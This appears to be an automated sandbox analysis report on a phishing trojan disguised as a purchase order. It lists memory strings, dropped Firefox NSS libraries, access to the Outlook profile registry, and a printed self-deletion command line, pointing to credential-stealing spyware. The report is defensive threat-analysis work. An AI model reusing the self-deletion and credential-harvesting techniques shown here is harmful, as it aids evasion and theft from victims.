Source: PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7191917075.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: PO No. 3200005919.exe	ReversingLabs: Detection: 61%
Source: PO No. 3200005919.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File read: C:\Users\user\Desktop\PO No. 3200005919.exe

Source: PO No. 3200005919.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

1_2_00403489

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File created: C:\Users\user\Overfurnished

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File created: C:\Users\user\AppData\Local\Temp\nsqF39C.tmp

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@8/56@2/2

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Code function: 1_2_004020FE CoCreateInstance,

1_2_004020FE

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Code function: 1_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404814

Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-E1A93A45-640FB406
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:304:WilStaging_02

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

File written: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Afskede\Hitherunto\Sale\Swedish.ini

Source: C:\Users\user\Desktop\PO No. 3200005919.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Self deletion via cmd or bat file

Source: PO No. 3200005919.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
